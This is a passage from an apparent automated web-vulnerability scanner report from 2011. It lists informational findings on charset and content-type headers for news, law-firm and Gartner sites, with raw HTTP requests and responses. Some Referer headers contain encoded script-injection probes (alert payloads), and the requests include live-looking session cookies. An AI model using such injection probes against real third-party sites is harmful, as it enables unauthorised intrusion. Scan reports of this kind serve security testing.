X-Powered-By: ASP.NET
Content-Length: 393
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCACQABB=PKLLAFKBEJGDBLAAIHGDBFBA; path=/
Cache-control: private


<html>
<head>
<script>
   document.location.href = '/new/homenew.aspx'
</script>
   <title>McCarter & English, LLP</title>
   <META HTTP-EQUIV="Refresh" CONTENT="0 ; URL=http://www.mccarter.com/ne
...[SNIP]...
34.17. http://www.moritthock.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php

Request

GET /index.php?css={stylesheet=global/nav HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/
Cookie: exp_last_visit=1305221465; exp_last_activity=1305234570; __utma=175020734.1039693598.1305202900.1305202900.1305202900.1; __utmz=175020734.1305202900.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 11
Content-Type: text/html

Invalid URI
34.18. http://www.nldhlaw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nldhlaw.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.nldhlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASPSESSIONIDASCAQAQD=FPPKOIPBNEPEKIPAKHLPOKPB; BIGipServerFIRMSND07-80=272948490.20480.0000; CP=null*; s_sess=%20flid%3D1305216553783%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dnelson%252Blevine%252Bdeluca%252B%2526%252Bhorstwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Dnelson%252Blevine%252Bdeluca%252B%2526%252Bhorst%3B%20s_sq%3D%3B; s_pers=%20ch_directload%3D1%7C1305218353786%3B%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216553787'%255D%255D%7C1463069353787%3B%20s_vnum%3D1307808553788%2526vn%253D1%7C1307808553788%3B%20s_invisit%3Dtrue%7C1305218353788%3B%20omtr_lv%3D1305216553789%7C1399824553789%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305218353789%3B%20s_nr%3D1305216553790%7C1307808553790%3B; randomizeImagei-context-=1

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:10:57 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
34.19. http://www.nytimes.com/adx/bin/adx_remote.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /adx/bin/adx_remote.html

Request

GET /adx/bin/adx_remote.html?type=fastscript&page=www.nytimes.com/yr/mo/day/&posall=Frame6A&query=qstring&keywords=? HTTP/1.1
Host: www.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; _chartbeat2=8c1mweurlbk22c68; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:54:11 GMT
Content-type: text/html
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 621


var adxads = new Array(1);

adxads[0] = "<!-- ADXINFO classification=\"banner\" campaign=\"foxsearch2011_emailtools_1629901h_nyt5\"--><a href=\"http://www.nytimes.com/adx/bin/adx_click.html?type=goto
...[SNIP]...
34.20. http://www.nytimes.com/adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B

Request

GET /adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B HTTP/1.1
Host: www.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=61755AB5B621ED6279F440ECA861ED6F&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.20.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; _chartbeat2=8c1mweurlbk22c68; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:53:43 GMT
Content-type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 45

GIF89a.............!.......,..............X.;
34.21. http://www.nytimes.com/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /facebook

Request

GET /facebook?format=json HTTP/1.1
Host: www.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; _chartbeat2=8c1mweurlbk22c68; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:54:14 GMT
ntCoent-length: 866
Content-type: text/html
Pragma: no-cache
Expires: -1
Cache-control: no-cache
Cache-control: no-store
Cache-control: max-age=1
Cneonction: close
Content-Length: 866

[{"title":"Proms as Do-Overs for Adults","url":"http:\/\/www.nytimes.com\/2011\/05\/12\/us\/12prom.html\/","counts":{"share_count":"7","post_count":"88","like_count":"92","comment_count":"164","click_
...[SNIP]...
34.22. http://www.nytimes.com/svc/timespeople/bell.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /svc/timespeople/bell.html

Request

GET /svc/timespeople/bell.html HTTP/1.1
Host: www.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Fwww.nytimes.com%2F2010%2F08%2F22%2Fsports%2Fcycling%2F22armstrong.html%3F59261%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E223d24b026d%3D1&method=get&params=&bell=http://www.nytimes.com/svc/timespeople/bell.html
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; _chartbeat2=8c1mweurlbk22c68; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:54:11 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 54

<!-- This file is used by NewsPeple. Do not delete -->
34.23. http://www.powelltrachtman.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.powelltrachtman.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.powelltrachtman.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASPSESSIONIDASCDRDSB=MPBKIAACBIHGDJIDLNEFJILO; BIGipServerFIRMSND13-80=423943434.20480.0000; CP=null*; s_sess=%20flid%3D1305216538594%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dpowell%252Btrachtmanwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Dpowell%252Btrachtman%3B%20s_sq%3D%3B; s_pers=%20ch_directload%3D1%7C1305218338596%3B%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216538598'%255D%255D%7C1463069338598%3B%20s_vnum%3D1307808538599%2526vn%253D1%7C1307808538599%3B%20s_invisit%3Dtrue%7C1305218338599%3B%20omtr_lv%3D1305216538600%7C1399824538600%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305218338600%3B%20s_nr%3D1305216538601%7C1307808538601%3B

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:09:29 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
34.24. http://www.rothmanconsulting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rothmanconsulting.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.rothmanconsulting.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASPSESSIONIDQCDAASCT=JFIIAFLBIGKBOIACNJCNNNPG; __utma=95041695.200759294.1305223732.1305223732.1305223732.1; __utmb=95041695.1.10.1305223732; __utmc=95041695; __utmz=95041695.1305223732.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/rothman-consulting

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:08:57 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
34.25. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

Request

GET /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:25 GMT
Connection: close
Content-Length: 56512


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">OAS_listpos =
"InvCount,PageCount,AdOps1,Top7
...[SNIP]...
35. HTML uses unrecognised charset  previous  next
There are 6 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

35.1. http://gigablast.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://gigablast.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bing.com/search?q=gigablast.com&src=ie9tr
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: gigablast.com

Response

HTTP/1.1 200 OK
Content-Length: 2440
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:14:26 GMT
Date: Thu, 12 May 2011 15:14:01 GMT
Last-Modified: Thu, 12 May 2011 15:14:01 GMT

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta name="description" content="A powerful, new search engine that does real-time indexing!">
<meta name="key
...[SNIP]...
35.2. http://www.gartner.com/0_admin/PasswordRequest.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.gartner.com
Path:   /0_admin/PasswordRequest.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /0_admin/PasswordRequest.jsp?startPage=https://my.gartner.com/portal/server.pt HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231772135:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:22:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U120AE182].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22134

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Request Password</title>


<script src="/js/utility.js" type="text/javascript"></script>
<scr
...[SNIP]...
35.3. http://www.gartner.com/0_admin/TechnicalSupportPhone.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.gartner.com
Path:   /0_admin/TechnicalSupportPhone.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /0_admin/TechnicalSupportPhone.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/0_admin/PasswordRequest.jsp?startPage=https://my.gartner.com/portal/server.ptfe694%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E7999e454e36
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231838879:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:24:26 GMT
Content-Length: 11729
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U18C3401D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=9e2790be5044ed0b5aee1b9a3d4c85c7b051461b2195a5984dcc41fa; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>

<!-- Changes to title and meta tags will be overwritten by tagging workflow -->
<!-- Please use the tagging UI to add
...[SNIP]...
35.4. http://www.gartner.com/include/webtrends.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.gartner.com
Path:   /include/webtrends.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:18:56 GMT
Set-Cookie: WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; domain=.gartner.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/
Content-Length: 22376

<!-- START OF Advanced SmartSource Data Collector TAG -->
<!-- Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.-->
<!-- $DateTime: 2006/03/09 14:15:22 $ -->
<!-- 2006/10/30: Modified by
...[SNIP]...
35.5. http://www.gigablast.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.gigablast.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET / HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2440
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:27 GMT
Date: Thu, 12 May 2011 15:16:02 GMT
Last-Modified: Thu, 12 May 2011 15:16:02 GMT

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta name="description" content="A powerful, new search engine that does real-time indexing!">
<meta name="key
...[SNIP]...
35.6. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /news14300.html HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=1b8355f904f52bc3571b2b0ee9c39004; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34848

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<meta name="description" content="No host city has shown the level of community business support that Hartford companies have bestowed on the Visa Championships that start next week." />        <meta http-equiv="content-type" content="text/html; charset=utf8" />
       <link rel="alternate" type="application/rss+xml" title="RSS 2.0"
           href="http://www.hartfordbusiness.com/feeds/main.php" />
...[SNIP]...
36. Content type incorrectly stated  previous  next
There are 24 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

36.1. http://centrifugesystems.app101.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://centrifugesystems.app101.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: centrifugesystems.app101.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.centrifugesystems.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 19:27:56 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
